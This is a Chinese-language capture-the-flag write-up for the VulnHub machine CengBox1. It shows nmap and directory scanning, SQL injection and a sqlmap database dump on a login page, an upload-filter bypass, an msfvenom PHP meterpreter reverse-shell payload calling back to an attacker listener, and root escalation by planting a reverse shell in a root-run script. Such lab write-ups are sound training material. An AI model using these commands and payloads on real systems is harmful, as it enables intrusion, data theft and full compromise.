VULNHUB靶机 CENGBOX1
2022-01-27 本文已影响0人
doinb1517
题目描述
desc.png解题记录
Reconnaissance
使用namp
扫描主机
nmap -sT 192.168.1.11
01.png
发现80和22端口开放,尝试访问
02.png尝试目录爆破
dirsearch -u http://192.168.1.11
dirb http://192.168.1.11 /usr/share/wordlists/dirb/big.txt
扫描出以下几个
http://192.168.1.11/masteradmin
http://192.168.1.11/index.php
直接访问http://192.168.1.11/masteradmin
显示403
继续扫描该目录下的php后缀的文件
http://192.168.1.11/masteradmin/login.php
http://192.168.1.11/masteradmin/upload.php
访问http://192.168.1.11/masteradmin/login.php
,发现登录页面
Execution
直接尝试一下sql注入,直接进入上传页面。再使用sqlmap
查看数据库名
sqlmap -r login.txt --dbs
dbs.png
爆破表
sqlmap -r login.txt -D cengbox --dump
table.png
继续回到上传页面,上传一个php一句话木马,失败,页面左上角有提示,这个提示的颜色和背景色很像,不注意根本看不到,根据提示修改后缀为.ceng
上传。
生成payload,上传成功。
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.2 lport=1234 -o re_shell.ceng
upload_success.png
获取shell,发现用户cengover
,使用数据库中发现的密码连接
尝试连接
cengover.png
发现cengover
的flag
Privilege Escalation
使用pspy
提权, Github
找到一个可用的
MD5.png查看该文件的读写权限,
ls.png生成反弹shell,写入/opt/md5check.py
在msfconsole
等待连接即可,得到root权限